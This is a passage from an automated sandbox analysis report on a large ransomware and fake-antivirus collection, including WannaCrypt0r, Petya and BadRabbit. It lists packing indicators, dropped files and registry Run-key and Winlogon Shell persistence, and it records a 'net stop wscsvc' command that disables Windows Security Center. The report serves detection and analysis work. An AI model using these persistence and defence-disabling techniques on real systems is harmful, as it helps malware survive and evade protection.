          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_3_007BA559 push ss; retf 5_3_007BA55C
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_3_007BA559 push ss; retf 5_3_007BA55C
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_3_007BA55D push ss; iretd 5_3_007BA56C
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_3_007BA55D push ss; iretd 5_3_007BA56C
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_3_007BC532 push cs; iretd 5_3_007BC534
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_3_007BC532 push cs; iretd 5_3_007BC534
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064EA78 push ds; iretd 8_3_0064ED38
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064EA78 push ds; iretd 8_3_0064ED38
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064C6E4 push eax; retf 0064h8_3_0064C6E5
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064C6E4 push eax; retf 0064h8_3_0064C6E5
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064ECCE push ds; iretd 8_3_0064ED38
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064ECCE push ds; iretd 8_3_0064ED38
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064C9A0 push 606F032Fh; retf 0064h8_3_0064CA6D
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064C9A0 push 606F032Fh; retf 0064h8_3_0064CA6D
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064EA78 push ds; iretd 8_3_0064ED38
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064EA78 push ds; iretd 8_3_0064ED38
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064C6E4 push eax; retf 0064h8_3_0064C6E5
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064C6E4 push eax; retf 0064h8_3_0064C6E5
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064ECCE push ds; iretd 8_3_0064ED38
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064ECCE push ds; iretd 8_3_0064ED38
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064C9A0 push 606F032Fh; retf 0064h8_3_0064CA6D
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064C9A0 push 606F032Fh; retf 0064h8_3_0064CA6D
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_00411585 LoadLibraryA,LoadLibraryA,LoadLibraryA,#17,LoadLibraryA,GetProcAddress,FreeLibrary,SHGetMalloc,5_2_00411585
          Source: Endermanch@AntivirusPro2017.exe.0.drStatic PE information: section name: .data2
          Source: Endermanch@Movie.mpeg.exe.0.drStatic PE information: section name: .wdata
          Source: Endermanch@Movie.mpeg.exe.0.drStatic PE information: section name: .fdata
          Source: Endermanch@Movie.mpeg.exe.0.drStatic PE information: section name: .mdata
          Source: Endermanch@SE2011.exe.0.drStatic PE information: section name: .code
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name: .adata
          Source: Endermanch@Movie.mpeg.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x6d4ce
          Source: Endermanch@WannaCrypt0r.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x363012
          Source: Endermanch@HappyAntivirus.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1ed7f7
          Source: Endermanch@PolyRansom.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x4214c
          Source: Endermanch@AntivirusPro2017.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xcfabb
          Source: Endermanch@PCDefender.exe.0.drStatic PE information: real checksum: 0x21337 should be: 0xe33fd
          Source: Endermanch@DeriaLock.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x82848
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x23c0c0
          Source: Endermanch@Xyeta.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x18075
          Source: 4d44bed6.exeStatic PE information: real checksum: 0x0 should be: 0x3169d
          Source: Endermanch@AntivirusPlatinum.exe.0.drStatic PE information: real checksum: 0x21337 should be: 0xc4420
          Source: Endermanch@InternetSecurityGuard.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x62e80b
          Source: Endermanch@NavaShield.exe.0.drStatic PE information: real checksum: 0x81831 should be: 0x9bc9b7
          Source: Endermanch@ViraLock.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x3a0f8
          Source: Endermanch@WinlockerVB6Blacksod.exe.0.drStatic PE information: real checksum: 0x1676f6 should be: 0x26f735
          Source: Endermanch@VAV2008.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xc7a3e
          Source: Endermanch@NoMoreRansom.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1624e8
          Source: Endermanch@Krotten.exe.0.drStatic PE information: real checksum: 0x13aae should be: 0xee00
          Source: Endermanch@Antivirus.exe.0.drStatic PE information: real checksum: 0x200061 should be: 0x206fc7
          Source: Endermanch@InfinityCrypt.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x3cd67
          Source: Endermanch@Birele.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x22594
          Source: Endermanch@SecurityDefender.exe.0.drStatic PE information: real checksum: 0x1797c0 should be: 0x1762de
          Source: Endermanch@SE2011.exe.0.drStatic PE information: real checksum: 0x271eac should be: 0x26a7fe
          Source: Endermanch@SmartDefragmenter.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x789b3
          Source: Endermanch@LPS2019.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x12a4ca
          Source: Fantom.exe.0.drStatic PE information: real checksum: 0x23bfb should be: 0x42811
          Source: Endermanch@SecurityDefener2015.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x137242
          Source: Endermanch@AnViPC2009.exe.0.drStatic PE information: real checksum: 0x236e4 should be: 0x12f8ba
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\__tmp_rar_sfx_access_check_17962203Jump to behavior
          Source: initial sampleStatic PE information: section name: .text entropy: 7.966504223719695
          Source: initial sampleStatic PE information: section name: .text entropy: 7.3467930766155956
          Source: initial sampleStatic PE information: section name: .text entropy: 7.193641199482148
          Source: initial sampleStatic PE information: section name: .text entropy: 7.995168937044817
          Source: initial sampleStatic PE information: section name: .text entropy: 7.848405878864468
          Source: initial sampleStatic PE information: section name: .text entropy: 7.914448567969065
          Source: initial sampleStatic PE information: section name: entropy: 7.9958918474030645
          Source: initial sampleStatic PE information: section name: entropy: 7.994235618092612
          Source: initial sampleStatic PE information: section name: entropy: 7.636979274606437
          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.996124045562077
          Source: initial sampleStatic PE information: section name: .data entropy: 7.737096645949357
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\antivirus-platinum.exe
          Source: C:\Windows\SysWOW64\rundll32.exeExecutable created and started: C:\Windows\3F22.tmp
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeExecutable created and started: C:\Windows\302746537.exeJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@Cerber5.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@SE2011.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@SmartDefragmenter.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeFile created: C:\Program Files (x86)\antiviruspc2009\bzip2.dllJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\MSCOMCTL.OCXJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeFile created: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@Xyeta.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\302746537.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@WinlockerVB6Blacksod.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@PolyRansom.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@VAV2008.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@Antivirus.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@LPS2019.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@NoMoreRansom.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@SecurityDefener2015.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@Birele.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\COMCTL32.OCXJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@Krotten.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Fantom.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@PCDefender.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@RegistrySmart.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@SecurityCentral.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@SecurityScanner.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeFile created: C:\Users\user\AppData\Local\6AdwCleaner.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@NavaShield.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\antivirus-platinum.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeFile created: C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dllJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@Movie.mpeg.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@SecurityDefender.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@DeriaLock.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@BadRabbit.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeFile created: C:\Program Files (x86)\antiviruspc2009\libltdl3.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@Petya.A.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@ViraLock.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\COMCTL32.OCXJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\antivirus-platinum.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\MSCOMCTL.OCXJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\302746537.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AntivirusJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run system
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdwCleaner
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Windows\antivirus-platinum.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AntivirusJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AntivirusJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run system
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run system
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdwCleaner
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdwCleaner
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Windows\302746537.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\302746537.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
